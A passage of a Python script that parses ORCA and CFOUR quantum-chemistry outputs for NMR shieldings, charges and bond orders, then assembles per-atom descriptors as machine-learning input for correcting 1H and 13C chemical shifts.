if el != first:\n equal = False\n break\n\n return equal\n\n\ndef read_number(entry):\n \"\"\"For an arbitrary string entry containing one (int or float) number surrounded by chars, extract the number.\"\"\"\n\n start, end = None, None\n\n for i, c in enumerate(entry):\n if c.isdigit():\n start = i\n break\n if start is None:\n print(\"ERROR in read_number(): entry '{}' does not contain any digit!\".format(entry))\n exit()\n \n for i, c in enumerate(reversed(entry)):\n if c.isdigit():\n end = len(entry) - i\n break\n\n return entry[start:end]\n\n\ndef get_end(data, start):\n \"\"\"For a given read input file, get the line range until next blank line.\n \n data: complete list of lines that has been read from a file via .readlines()\n start: line number of the first line of the text block\n \"\"\"\n\n n_lines = 0\n while data[start+n_lines] != '\\n':\n n_lines += 1\n\n return start + n_lines\n\n\ndef read_cfour(outpath):\n \"\"\"Read the coupled cluster output from CFOUR calculations.\"\"\"\n\n with open(outpath, 'r') as inp:\n data = inp.readlines()\n\n # get the range in which the shieldings are listed\n start = data.index(' CCSD(T) Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') + 5\n end = data.index(' HF-SCF Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') - 3\n \n shieldings = []\n for line in data[start:end]:\n tmp = line.split()\n shieldings.append({\n 'nuc': int(tmp[0]),\n 'elem': tmp[1].upper(),\n 'val': float(tmp[2])\n })\n\n # make sure the shieldings are ordered according to the atom numbering (store as tuple)\n return tuple(sorted(shieldings, key=lambda s: s['nuc']))\n\n\n# get number of calculated NMR nuclei\n# outlist is a list of lines read from a calculation output file\ndef get_number_nmr(outlist):\n \n n_nmr = None\n for line in outlist[outlist.index(' * ORCA property calculations *\\n'):]:\n if 'Number of nuclei for epr/nmr' in line: n_nmr = int(line.split()[-1])\n if n_nmr is None:\n print(\"ERROR: Number of calculated NMR nuclei was not found in ORCA output!\")\n exit()\n\n return n_nmr\n\n\ndef read_orca(outpath):\n \"\"\"Read the DFT output from ORCA calculations.\"\"\"\n\n with open(outpath, 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get the range in which the shieldings are listed\n start = data.index('CHEMICAL SHIELDING SUMMARY (ppm)\\n') + 6\n end = start + n_nmr\n\n shieldings = []\n for line in data[start:end]:\n tmp = line.split()\n shieldings.append({\n 'nuc': int(tmp[0]) + 1, # ORCA starts at 0 counting the nuc numbers\n 'elem': tmp[1].upper(),\n 'val': float(tmp[2])\n })\n\n # make sure the shieldings are ordered according to the atom numbering (store as tuple)\n return tuple(sorted(shieldings, key=lambda s: s['nuc']))\n\n\n# Get the reference shieldings from the coupled cluster output (CFOUR)\n# ATTENTION: all Hs and all Cs are averaged, works e.g. for TMS and CH4\ndef getref_cfour(path, ref, basis):\n \n with open(os.path.join(path, ref, \"ccsd_t\", basis, \"cfour.out\"), 'r') as inp:\n data = inp.readlines()\n\n # get the range in which the shieldings are listed\n start = data.index(' CCSD(T) Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') + 5\n end = data.index(' HF-SCF Nuclear Magnetic Resonance Shieldings and Anisotropies\\n') - 3\n \n val_h = 0.0\n val_c = 0.0\n cnt_h = 0\n cnt_c = 0\n\n for line in data[start:end]:\n tmp = line.split()\n if tmp[1].upper() == 'H':\n val_h += float(tmp[2])\n cnt_h += 1\n if tmp[1].upper() == 'C':\n val_c += float(tmp[2])\n cnt_c += 1\n\n val_h = val_h / cnt_h\n val_c = val_c / cnt_c\n\n return {'H': val_h, 'C': val_c}\n\n\n# Get the reference shieldings from the DFT output (ORCA)\n# ATTENTION: all Hs and all Cs are averaged, works e.g. for TMS and CH4\ndef getref_orca(path):\n\n with open(os.path.join(path, \"orca.out\"), 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get the range in which the shieldings are listed\n start = data.index('CHEMICAL SHIELDING SUMMARY (ppm)\\n') + 6\n end = start + n_nmr\n \n val_h = 0.0\n val_c = 0.0\n cnt_h = 0\n cnt_c = 0\n\n for line in data[start:end]:\n tmp = line.split()\n if tmp[1].upper() == 'H':\n val_h += float(tmp[2])\n cnt_h += 1\n if tmp[1].upper() == 'C':\n val_c += float(tmp[2])\n cnt_c += 1\n\n val_h = val_h / cnt_h\n val_c = val_c / cnt_c\n\n return {'H': val_h, 'C': val_c}\n\n\ndef inv_cubic(x, a, b):\n return a / x**3 + b\n\n\ndef extrapolate(cc_3z, dft_3z, dft_4z, dft_5z):\n\n cardinal = np.array([4, 5, 6])\n shielding = np.array([dft_3z, dft_4z, dft_5z])\n\n xdata = cardinal\n ydata = shielding\n\n params_cub, _ = curve_fit(inv_cubic, xdata, ydata, p0=[10,100]) # params_cub = [a b]\n dft_cbs = params_cub[1]\n\n return cc_3z + (dft_cbs - dft_3z)\n\n\n# read the molecule and return mol (ase.Atoms object) and dict neighbors\ndef read_mol(structpath):\n\n # read the .xyz coordinates from the molecular structures\n mol = read(os.path.join(structpath), format='xyz')\n\n # use covalent radii as thresholds for neighbor determination (what about vdW radii?)\n cutoffs = [custom_radii[atom.number] for atom in mol]\n\n # build neighbor list and write list of neighboring atoms to the dict neighbors\n nl = neighborlist.build_neighbor_list(mol, cutoffs, self_interaction=False, bothways=True)\n neighbors = {}\n\n for i in range(len(mol)):\n indices = nl.get_neighbors(i)[0] # nl.get_neighbors(i) returns [0]: indices and [1]: offsets\n neighbors[i+1] = indices+1 # add 1 to key and to value to start counting of atoms at 1\n\n # exit if an H atom has not exactly 1 neighbor\n if mol.get_atomic_numbers()[i] == 1 and len(neighbors[i+1]) != 1:\n print(\"ERROR: H atom {} has not exactly one neighbor! File in: {}\".format(i+1, structpath))\n exit()\n\n return mol, neighbors\n\n\n# get the coordination number (CN) as number of neighbors (input is neighbors from read_mol)\n# read_mol() ensures that every H atom has exactly one neighbor\ndef get_cn(neighbors):\n cn = {}\n for key, value in neighbors.items():\n cn[key] = len(value)\n\n return cn\n\n\n# get the coordination number (CN) like it is done in the D3 dispersion correction model:\n# CN(A) = sum_B!=A^Nat ( 1 / (1 + exp(-k1 (k2*R_AB^cov/R_AB - 1))) )\n# with A, B: atom indices, Nat: number of atoms in molecule,\n# R_AB: distance of A and B according to input structure\n# k2*R_AB^cov = k2*(R_A^cov + R_B^cov): element-specific covalent atom radii from Pyykkö and Atsumi scaled with k2 = 4/3\n# k1 = 16: scaling factor; both k1 and k2 are set in the D3 model (J. Chem. Phys. 132, 154104); covalent_rad_d3 already include k2 (see above)\ndef get_cn_d3(mol):\n an = mol.get_atomic_numbers() # get the atomic numbers as list\n distances = mol.get_all_distances() # get all the atom distances as 2D list\n cn = {i+1: 0.0 for i in range(len(an))} # fill a dict with 0.0 for all atom indices\n\n # loop over all atom pairs\n for a in range(len(an)):\n for b in range(a+1, len(an)):\n r_ab = distances[a][b]\n rcov_ab = covalent_rad_d3[an[a]] + covalent_rad_d3[an[b]]\n term = 1.0 / (1.0 + np.exp(-16.0 * (rcov_ab/r_ab - 1.0)))\n # add the term of the sum to the CN entry of both a and b (in dict: atom indices, no 0)\n cn[a+1] += term\n cn[b+1] += term\n\n return cn\n\n\n# in the eyes of a certain atom, get the number of bonded X atoms (X = H, C, N, O, S, Cl)\n# retruns a dict with all atoms [no_H, no_C, no_N, no_O, no_S, no_Cl]\n# if only_for is not empty, then get no_atoms only for chosen nuclei (e.g. [1, 6] for only H and C)\ndef get_no_bond_atoms(mol, neighbors, only_for=[]):\n no_atoms = {}\n elements = [1, 6, 7, 8, 16, 17] # H, C, N, O, S, Cl\n\n for key, value in neighbors.items():\n # if only_for is not empty, make sure the atomic number of key fits entries in only_for\n if len(only_for) == 0 or mol.get_atomic_numbers()[key-1] in only_for:\n n = [0, 0, 0, 0, 0, 0] # number of H, C, N, O, S, Cl\n for neigh in value:\n anx = mol.get_atomic_numbers()[neigh-1]\n for i, elem in enumerate(elements):\n if anx == elem:\n n[i] += 1\n no_atoms[key] = n\n \n return no_atoms\n\n\n# in the eyes of a certain atom, get the number of secondarily bonded X atoms (X = H, C, N, O, S, Cl)\n# retruns a dict with all atoms [no_H, no_C, no_N, no_O, no_S, no_Cl]\n# if only_for is not empty, then get no_atoms only for chosen nuclei (e.g. [1, 6] for only H and C)\ndef get_no_sec_atoms(mol, neighbors, only_for=[]):\n no_atoms = {}\n elements = [1, 6, 7, 8, 16, 17] # H, C, N, O, S, Cl\n cn = get_cn(neighbors) # in this context, coordination number means number of directly bonded atoms\n prim_bonded = get_no_bond_atoms(mol, neighbors)\n\n for key, value in neighbors.items():\n # if only_for is not empty, make sure the atomic number of key fits entries in only_for\n if len(only_for) == 0 or mol.get_atomic_numbers()[key-1] in only_for:\n n = [0, 0, 0, 0, 0, 0] # number of H, C, N, O, S, Cl\n\n # for all neighbors of key, add all entries of prim_bonded to n\n for neigh in value:\n for i in range(len(elements)):\n n[i] += prim_bonded.get(neigh)[i]\n\n # now, atom key has falsely been counted cn(key) times (if it occurs in elements)\n this_an = mol.get_atomic_numbers()[key-1] # the atomic number of atom key\n this_cn = cn.get(key) # the CN of atom key is 1 for H atoms\n # subtract respective entries in n\n if this_an in elements:\n n[elements.index(this_an)] -= this_cn\n\n no_atoms[key] = n\n \n return no_atoms\n\n\ndef get_atomic_charges(mol, outputpath, mode):\n \"\"\"Get atomic charges from ORCA output.\n\n everything is stored in dicts {index: charge}\n mode: can be 'mulliken' or 'loewdin'\n \"\"\"\n\n nat = len(mol)\n charges = {}\n\n if mode == 'mulliken':\n pattern = 'MULLIKEN ATOMIC CHARGES\\n'\n offset = 2\n elif mode == 'loewdin':\n pattern = 'LOEWDIN ATOMIC CHARGES\\n'\n offset = 2\n else:\n print(\"ERROR: unknown mode in get_atomic_charges!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the Mulliken charges are listed\n start = data.index(pattern) + offset\n end = start + nat\n\n # first entry in line is index starting at 0, last is the value\n for line in data[start:end]:\n tmp = line.split()\n charges[int(tmp[0])+1] = float(tmp[-1])\n\n return charges\n\n\ndef get_orbital_charges(outputpath, mode):\n \"\"\"Get orbital charges form ORCA output.\n\n for H: s-/p-orbital charges; for C also d-orbital charges\n also get the standard deviation of the 3 p orbital charges (px/py/pz) as mean of uniform charge distribution\n everything is stored in dicts {index: charge}\n mode: can be 'mulliken' or 'loewdin'\n \"\"\"\n\n s_charges = {}\n p_charges = {}\n d_charges = {}\n px_charges = {}\n py_charges = {}\n pz_charges = {}\n p_stdev = {}\n\n if mode == 'mulliken':\n pattern = 'MULLIKEN REDUCED ORBITAL CHARGES\\n'\n offset = 2\n elif mode == 'loewdin':\n pattern = 'LOEWDIN REDUCED ORBITAL CHARGES\\n'\n offset = 2\n else:\n print(\"ERROR: unknown mode in get_orbital_charges!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the orbital charges of the given pattern are listed\n start = data.index(pattern) + offset\n end = get_end(data, start)\n\n # go through the lines and store the sums of s/p/d orbital entries (last column each) in the dicts\n for index, line in enumerate(data[start:end]):\n tmp = line.split()\n\n if tmp[0].isdigit():\n # atom number and next lines\n atnum = int(tmp[0]) + 1\n tmp_next1 = data[start+index+1].split()\n tmp_next2 = data[start+index+2].split()\n tmp_next3 = data[start+index+3].split()\n # s- and p-orbital charges\n s_charges[atnum] = float(tmp[-1])\n p_charges[atnum] = float(tmp_next1[5])\n pz_charges[atnum] = float(tmp_next1[2])\n px_charges[atnum] = float(tmp_next2[2])\n py_charges[atnum] = float(tmp_next3[2])\n\n # d-orbital charge (only for carbon)\n if tmp[1] == 'C':\n tmp_next4 = data[start+index+4].split()\n d_charges[atnum] = float(tmp_next4[5])\n\n for at in p_charges.keys():\n p_stdev[at] = statistics.stdev([px_charges[at], py_charges[at], pz_charges[at]])\n #p_stdev[at] = np.std([px_charges[at], py_charges[at], pz_charges[at]], ddof=1)\n\n return s_charges, p_charges, d_charges, p_stdev\n\n\ndef get_Mayer_pop(mol, outputpath):\n \"\"\"Get the Mayer population analysis.\n \n VA: total valence\n BVA: bonded valence\n FA: free valence\n \"\"\"\n\n nat = len(mol)\n va = {}\n bva = {}\n fa = {}\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the Mayer valence values are listed\n start = data.index(' * MAYER POPULATION ANALYSIS *\\n') + 11\n end = start + nat\n\n # first column is atom index, 6-8 in line is index of the valence quantities\n for line in data[start:end]:\n tmp = line.split()\n va[int(tmp[0])+1] = float(tmp[5])\n bva[int(tmp[0])+1] = float(tmp[6])\n fa[int(tmp[0])+1] = float(tmp[7])\n\n return va, bva, fa\n\n\ndef get_bond_orders(neighbors, outputpath, mode):\n \"\"\"get bond orders for of Loewdin and Mayer type.\n \n \n reads bond orders and calculates the sum and average for each atom\n returns list of dicts\n mode: can be 'loewdin' or 'mayer'\n \"\"\"\n\n bond_orders = []\n bond_orders_sum = {}\n bond_orders_av = {}\n if mode == 'loewdin':\n pattern = 'LOEWDIN BOND ORDERS (THRESH 0.050000)\\n'\n offset = 2\n thresh_bo = 0.05\n elif mode == 'mayer':\n pattern = ' Mayer bond orders larger than 0.100000\\n'\n offset = 1\n thresh_bo = 0.1\n else:\n print(\"ERROR: unknown mode in get_bond_orders!\")\n exit()\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n \n # get the range in which the bond orders of the given pattern are listed\n start = data.index(pattern) + offset\n end = get_end(data, start)\n\n # read all bond orders and store in list of dicts (up to 3 entries per line)\n for line in data[start:end]:\n # remove all unnecessary characters from the list because they can unite with the element symbol if it has 2 letters\n # e.g. ['0-C', ','] but ['11-Li,'] (same for ')', same for 3-digit atoms numbers); without those, all entries should contain 3 elements\n #tmp = list(filter(lambda c: c not in [',', 'B(', ')', ':'], line.split())) # old way to deal with the problem\n tmp = line.replace(',', ' ').replace('B(', ' ').replace(')', ' ').replace(':', ' ').split()\n for i in range(int(len(tmp)/3)):\n bond_orders.append({\n 'atom_A': int(read_number(tmp[i*3]))+1,\n 'atom_B': int(read_number(tmp[i*3+1]))+1,\n 'bond_order': float(tmp[i*3+2])\n })\n\n # use atoms (key) and neighbors (value) to look for all bonds for each atom and collect the respective bond orders\n for key, value in neighbors.items():\n these_bos = []\n for bo in bond_orders:\n if (bo['atom_A'] == key and bo['atom_B'] in value) or (bo['atom_B'] == key and bo['atom_A'] in value):\n these_bos.append(bo['bond_order'])\n \n # in case bond order of known neighbors are below the threshold, they are missing; add respective entries with value 1/2 * threshold\n bo_missing = len(value) - len(these_bos)\n if bo_missing != 0: these_bos.extend([thresh_bo/2 for i in range(bo_missing)])\n \n # calculate sum and average of the collected bond orders\n bond_orders_sum[key] = sum(these_bos)\n bond_orders_av[key] = sum(these_bos)/len(these_bos) # this breaks if an atoms has no neighbors\n \n return bond_orders_sum, bond_orders_av\n\n\n# in addition to the total isotropic shielding constant (read by read_orca), get the following additional NMR quantities:\n# diamagnetic shielding constant, paramagnetic shielding constant, span, skew, asymmetry, anisotropy\ndef get_nmr_quantities(outputpath):\n\n with open(outputpath, 'r') as inp:\n data = inp.readlines()\n\n # get number of calculated NMR nuclei\n n_nmr = get_number_nmr(data)\n\n # get start of the chemical shift block\n start = data.index('CHEMICAL SHIFTS\\n') + 6\n\n # data is arranged in blocks of 27 lines for every nucleus\n # line 21/22 contain dia-/paramagnetic shielding contants, 24 the total shielding with its components\n quantities = []\n for at in range(n_nmr):\n \n atnum = \"\"\n for c in data[start+at*27].split()[1]:\n if c.isdigit(): atnum += c\n atnum = int(atnum) + 1\n tmp = data[start+at*27+24].split()\n quantities.append({\n 'at_index': atnum,\n 'shielding_dia': data[start+at*27+21].split()[5],\n 'shielding_para': data[start+at*27+22].split()[5],\n 'sigma_components': [float(tmp[i+1]) for i in range(3)]\n })\n\n # calculate the quantities for all atoms\n for quant in quantities:\n \n # from shielding tensor sigma get min, mid and max value of the diagonal sigma_ii elements and sigma_iso\n sigma = quant['sigma_components'].copy()\n sigma_iso = sum(sigma)/len(sigma)\n sigma_min = min(sigma)\n sigma.remove(sigma_min)\n sigma_mid = min(sigma)\n sigma_max = max(sigma)\n\n # get span: Omega = sigma_max - sigma_min (>= 0)\n span = sigma_max - sigma_min\n\n # escape somehow if span == 0.0 (all other quantities are 0.0, too)\n if span < 0.0001:\n skew = 0.0\n asymmetry = 0.0\n anisotropy = 0.0\n else:\n # get skew: kappa = 3*(sigma_iso - sigma_mid)/Omega (-1 <= kappa <= 1)\n skew = 3*(sigma_iso - sigma_mid)/span\n\n # get asymmetry: eta = (sigma_mid - sigma_min)/(sigma_max - sigma_iso)\n asymmetry = (sigma_mid - sigma_min)/(sigma_max - sigma_iso)\n\n # get anisotropy: Delta = sigma_max - (sigma_min + sigma_mid)/2\n anisotropy = sigma_max - (sigma_min + sigma_mid)/2\n\n quant['span'] = span\n quant['skew'] = skew\n quant['asymmetry'] = asymmetry\n quant['anisotropy'] = anisotropy\n\n return tuple(sorted(quantities, key=lambda q: q['at_index']))\n\n\ndef get_reference(path_data, ref, func, basis, high=None):\n\n has_highlevel = False\n if high is not None: has_highlevel = True\n\n # get the reference shielding values (e.g. from TMS molecule)\n refshieldings = getref_orca(os.path.join(path_data, ref, func, basis))\n print(\"using low-level DFT 1H reference shielding ({}): {} ppm\".format(ref, refshieldings['H']))\n print(\"using low-level DFT 13C reference shielding ({}): {} ppm\\n\".format(ref, refshieldings['C']))\n\n refshieldings_high = {'H': None, 'C': None}\n if has_highlevel:\n # get high-level shieldings of reference compound if provided\n refshieldings_high_cc = getref_cfour(path_data, ref, high['basis_3z'])\n refshieldings_high_dft_cc = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_3z']))\n refshieldings_high_dft_x = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_4z']))\n refshieldings_high_dft_y = getref_orca(os.path.join(path_data, ref, high['functional'], high['basis_5z']))\n refshieldings_high_cc_cbs = {\n 'H': extrapolate(refshieldings_high_cc['H'], refshieldings_high_dft_cc['H'], refshieldings_high_dft_x['H'], refshieldings_high_dft_y['H']),\n 'C': extrapolate(refshieldings_high_cc['C'], refshieldings_high_dft_cc['C'], refshieldings_high_dft_x['C'], refshieldings_high_dft_y['C'])\n }\n\n print(\"using high-level CCSD(T)/TZ+ 1H reference shielding ({}): {} ppm\".format(ref, refshieldings_high_cc_cbs['H']))\n print(\"using high-level CCSD(T)/TZ+ 13C reference shielding ({}): {} ppm\\n\".format(ref, refshieldings_high_cc_cbs['C']))\n\n refshieldings_high = {'H': refshieldings_high_cc_cbs['H'], 'C': refshieldings_high_cc_cbs['C']}\n\n return refshieldings, refshieldings_high\n\n\n# Read all data from a molecule and process it to get the shieldings and shifts of all atoms\n# Save all information in two lists of dicts (data_h, data_c) and return further data to extend the ML input with\ndef get_data(path_xyz, path_out, name, ref_shield, include, high=None, ref_shield_high={'H': None, 'C': None}, path_data=None, print_names=False):\n\n has_highlevel = False\n if high is not None: has_highlevel = True\n\n data_h = []\n data_c = []\n\n # read the molecular data from the .xyz file and get the number of atoms and list of element symbols\n mol, neighbors = read_mol(path_xyz)\n nat = len(mol)\n\n # get shieldings of the sample compound from ORCA output\n shieldings = read_orca(path_out)\n nmr_nuc = [s['nuc'] for s in shieldings]\n\n if has_highlevel:\n # get high-level shieldings if provided\n shieldings_high_cc_full = read_cfour(os.path.join(path_data, 'ccsd_t', high['basis_3z'], 'cfour.out'))\n shieldings_high_dft_cc = read_orca(os.path.join(path_data, high['functional'], high['basis_3z'], 'orca.out'))\n shieldings_high_dft_x = read_orca(os.path.join(path_data, high['functional'], high['basis_4z'], 'orca.out'))\n shieldings_high_dft_y = read_orca(os.path.join(path_data, high['functional'], high['basis_5z'], 'orca.out'))\n # reduce the list to only the relevant NMR nuclei (only necessary for shielding from read_cfour)\n shieldings_high_cc = tuple([s for s in shieldings_high_cc_full if s['nuc'] in nmr_nuc])\n \n # get some data needed as descriptors\n bond_atoms = get_no_bond_atoms(mol, neighbors)\n sec_atoms = get_no_sec_atoms(mol, neighbors)\n cn_d3 = get_cn_d3(mol)\n distances = mol.get_all_distances()\n\n # get a buch of ML descriptors from the orca output (mainly based on density matrix and NMR properties)\n at_chrg_mulliken = get_atomic_charges(mol, path_out, 'mulliken')\n at_chrg_loewdin = get_atomic_charges(mol, path_out, 'loewdin')\n orb_chrg_mulliken_s, orb_chrg_mulliken_p, orb_chrg_mulliken_d, orb_stdev_mulliken_p = get_orbital_charges(path_out, 'mulliken')\n orb_chrg_loewdin_s, orb_chrg_loewdin_p, orb_chrg_loewdin_d, orb_stdev_loewdin_p = get_orbital_charges(path_out, 'loewdin')\n mayer_VA, _, _ = get_Mayer_pop(mol, path_out)\n bond_orders_loewdin_sum, bond_orders_loewdin_av = get_bond_orders(neighbors, path_out, 'loewdin')\n bond_orders_mayer_sum, bond_orders_mayer_av = get_bond_orders(neighbors, path_out, 'mayer')\n nmr_quantities = get_nmr_quantities(path_out)\n\n # get the symmetric fingerprint descriptors\n if 'acsf' in include:\n acsf_mol = descriptors.acsf.create(mol)\n if 'soap' in include:\n soap_mol = descriptors.soap.create(mol)\n soap_mol = np.delete(soap_mol, descriptors.soap_zero_indexlist, 1)\n\n # loop over all atoms in the compound\n for iat in range(len(nmr_nuc)):\n\n high_cc_3z = high_dft_3z = high_dft_4z = high_dft_5z = None\n\n if has_highlevel:\n # ensure 'nuc' and 'elem' is the same for all the data (shieldings_high_cc, _dft_cc, _dft_x, _dft_y and the low level sample)\n nucs = [shieldings_high_cc[iat]['nuc'], shieldings_high_dft_cc[iat]['nuc'], shieldings_high_dft_x[iat]['nuc'], shieldings_high_dft_y[iat]['nuc'], shieldings[iat]['nuc']]\n elems = [shieldings_high_cc[iat]['elem'], shieldings_high_dft_cc[iat]['elem'], shieldings_high_dft_x[iat]['elem'], shieldings_high_dft_y[iat]['elem'], shieldings[iat]['elem']]\n if not all_equal(nucs):\n print(\"ERROR with sample compound {}: nuclei order in CFOUR and ORCA outputs is not the same!\".format(name))\n exit()\n if not all_equal(elems):\n print(\"ERROR with sample compound {}: element order in CFOUR and ORCA outputs is not the same!\".format(name))\n exit()\n \n high_cc_3z = shieldings_high_cc[iat]['val']\n high_dft_3z = shieldings_high_dft_cc[iat]['val']\n high_dft_4z = shieldings_high_dft_x[iat]['val']\n high_dft_5z = shieldings_high_dft_y[iat]['val']\n\n # if the actual atom is a H atom, get the distance to the neighboring C atom and its computed chemical shift\n if shieldings[iat]['elem'] == 'H':\n # get the atom number of the neighbor (at starts from 0, but neighbors from 1; -1 to adjust neigh to at scale)\n neigh = neighbors[nmr_nuc[iat]][0] # there is only one neighbor because this is a H atom\n # skip the whole data point if the H atom is bound to something else than C (atomic number 6) (this can be extended later)\n if not mol.get_atomic_numbers()[neigh-1] == 6: continue\n # get the distance between the actual atom and its neigbor (distances list starts from 0)\n dist = distances[nmr_nuc[iat]-1][neigh-1]\n # get the shift of the neighoring C atom\n neighshift = ref_shield['C'] - next((s for s in shieldings if s['nuc'] == neigh), None)['val']\n\n # add all ACSF and SOAP descriptors\n # acsf_mol and soap_mol need the atom index, but start with 0 so nmr_nuc-1\n if 'acsf' in include:\n acsf_data = {acsf_name: acsf_mol[nmr_nuc[iat]-1][i] for i, acsf_name in enumerate(descriptors.acsf_labels)}\n if 'soap' in include:\n soap_data = {soap_name: soap_mol[nmr_nuc[iat]-1][i] for i, soap_name in enumerate(descriptors.soap_labels_reduced)}\n\n if shieldings[iat]['elem'] == 'H':\n\n datapoint = DataPointH(name, nmr_nuc[iat], print_names)\n datapoint.set_attr_general(\n shieldings[iat]['val'],\n at_chrg_mulliken[nmr_nuc[iat]],\n at_chrg_loewdin[nmr_nuc[iat]],\n orb_chrg_mulliken_s[nmr_nuc[iat]],\n orb_chrg_loewdin_s[nmr_nuc[iat]],\n orb_chrg_mulliken_p[nmr_nuc[iat]],\n orb_chrg_loewdin_p[nmr_nuc[iat]],\n mayer_VA[nmr_nuc[iat]],\n nmr_quantities[iat]['shielding_dia'],\n nmr_quantities[iat]['shielding_para'],\n nmr_quantities[iat]['span'],\n nmr_quantities[iat]['skew'],\n nmr_quantities[iat]['asymmetry'],\n nmr_quantities[iat]['anisotropy'],\n high_cc_3z,\n high_dft_3z,\n high_dft_4z,\n high_dft_5z\n )\n if 'acsf' in include: datapoint.set_acsf(acsf_data)\n if 'soap' in include: datapoint.set_soap(soap_data)\n datapoint.set_attr_special(\n ref_shield['H'],\n neighshift,\n cn_d3[neigh], # the D3 CN of the neighboring C atom\n bond_atoms[neigh][0], # number of H bonded to neighboring C\n [sec_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of secondarily bonded [H, C, N, O] (first 4 elements of sec_atoms)\n dist,\n bond_orders_loewdin_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_sum[nmr_nuc[iat]], # starts counting with 1\n ref_shield_high['H']\n )\n\n data_h.append(datapoint)\n\n\n if shieldings[iat]['elem'] == 'C':\n\n datapoint = DataPointC(name, nmr_nuc[iat], print_names)\n datapoint.set_attr_general(\n shieldings[iat]['val'],\n at_chrg_mulliken[nmr_nuc[iat]],\n at_chrg_loewdin[nmr_nuc[iat]],\n orb_chrg_mulliken_s[nmr_nuc[iat]],\n orb_chrg_loewdin_s[nmr_nuc[iat]],\n orb_chrg_mulliken_p[nmr_nuc[iat]],\n orb_chrg_loewdin_p[nmr_nuc[iat]],\n mayer_VA[nmr_nuc[iat]],\n nmr_quantities[iat]['shielding_dia'],\n nmr_quantities[iat]['shielding_para'],\n nmr_quantities[iat]['span'],\n nmr_quantities[iat]['skew'],\n nmr_quantities[iat]['asymmetry'],\n nmr_quantities[iat]['anisotropy'],\n high_cc_3z,\n high_dft_3z,\n high_dft_4z,\n high_dft_5z\n )\n if 'acsf' in include: datapoint.set_acsf(acsf_data)\n if 'soap' in include: datapoint.set_soap(soap_data)\n datapoint.set_attr_special(\n ref_shield['C'],\n cn_d3[nmr_nuc[iat]], # the D3 CN of the C atom\n [bond_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of bonded [H, C, N, O] (first 4 elements of bond_atoms)\n [sec_atoms[nmr_nuc[iat]][i] for i in range(4)], # number of secondarily bonded [H, C, N, O] (first 4 elements of sec_atoms)\n orb_chrg_mulliken_d[nmr_nuc[iat]], # starts counting with 1\n orb_chrg_loewdin_d[nmr_nuc[iat]], # starts counting with 1\n orb_stdev_mulliken_p[nmr_nuc[iat]], # starts counting with 1\n orb_stdev_loewdin_p[nmr_nuc[iat]], # starts counting with 1\n bond_orders_loewdin_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_sum[nmr_nuc[iat]], # starts counting with 1\n bond_orders_loewdin_av[nmr_nuc[iat]], # starts counting with 1\n bond_orders_mayer_av[nmr_nuc[iat]], # starts counting with 1\n ref_shield_high['C']\n )\n\n data_c.append(datapoint)\n\n\n # define metadata to be added to the ML input\n extension = [\n \"# nat: {}\".format(nat),\n \"# n_nmr_nuc: {}\".format(len(nmr_nuc)),\n \"# ref_h: {}\".format(ref_shield['H']),\n \"# ref_c: {}\".format(ref_shield['C'])\n ]\n\n return data_h, data_c, \"\\n\".join(extension)\n\n\n# shuffles a datalist in optional groups of atoms (=no groups), structures or compounds\n# datalist is a list of DataPointH and DataPointC objects\ndef shuffle_data(datalist, compounds, structures, mode='structures'):\n\n if mode == 'atoms':\n new_datalist = copy.deepcopy(datalist)\n random.Random(random_seed).shuffle(new_datalist)\n\n if mode == 'structures':\n metalist = []\n for comp in compounds:\n for struct in structures[comp]:\n tmp = []\n for data in datalist:\n if int(data.name[:dc]) == comp and int(data.name[-ds:]) == struct: tmp.append(data)\n metalist.append(tmp)\n random.Random(random_seed).shuffle(metalist)\n # the following combines lists in a list to one list (e.g. [[1,2],[3,4]] -> [1,2,3,4])\n new_datalist = [i for j in metalist for i in j]\n\n if mode == 'compounds':\n metalist = []\n for comp in compounds:\n tmp = []\n for data in datalist:\n if int(data.name[:dc]) == comp: tmp.append(data)\n metalist.append(tmp)\n random.Random(random_seed).shuffle(metalist)\n # the following combines lists in a list to one list (e.g. [[1,2],[3,4]] -> [1,2,3,4])\n new_datalist = [i for j in metalist for i in j]\n\n return new_datalist\n\n\n# Write full 1H/13C data from datalist into a file used as input for 1H/13C ML correction\n# mode can be 'H' or 'C' for 1H or 13C data; is_dataset is True for ML dataset or False for a sample molecule\n# additionally add an extension at the end of the file\n# (this is useful for a sample compound, where the dataset is a list of only one compound, to provide information for the ML script)\n# ATTENTION: This only gives reasonable output if datalist is purely H or purely C!\ndef write_ml_input(datalist, outpath, outname, extension=\"\", is_sample=False):\n\n atnums = \"# atom_numbers:\"\n printout = datalist[0].get_header()\n for data in datalist:\n printout.append(data.get_printout())\n if is_sample: atnums += \" \" + str(data.atom)\n if is_sample: printout.append(atnums)\n\n with open(os.path.join(outpath, outname), 'w') as out:\n out.write(\"\\n\".join(printout) + \"\\n\")\n out.write(extension)\n\n\nclass DataPoint:\n\n def __init__(self, name, atom, print_names=False):\n self.name = name\n self.atom = atom\n self.print_names = print_names\n self.include_acsf = False\n self.include_soap = False\n\n def set_attr_general(\n self, shielding_low,\n atomic_charge_mulliken, atomic_charge_loewdin,\n orbital_charge_mulliken_s, orbital_charge_loewdin_s,\n orbital_charge_mulliken_p, orbital_charge_loewdin_p,\n mayer_valence_total,\n shielding_diamagnetic, shielding_paramagnetic,\n span, skew, asymmetry, anisotropy,\n shielding_cc_3z=None, shielding_dft_3z=None, shielding_dft_4z=None, shielding_dft_5z=None\n ):\n self.shielding_low = shielding_low\n self.atomic_charge_mulliken = atomic_charge_mulliken\n self.atomic_charge_loewdin = atomic_charge_loewdin\n self.orbital_charge_mulliken_s = orbital_charge_mulliken_s\n self.orbital_charge_loewdin_s = orbital_charge_loewdin_s\n 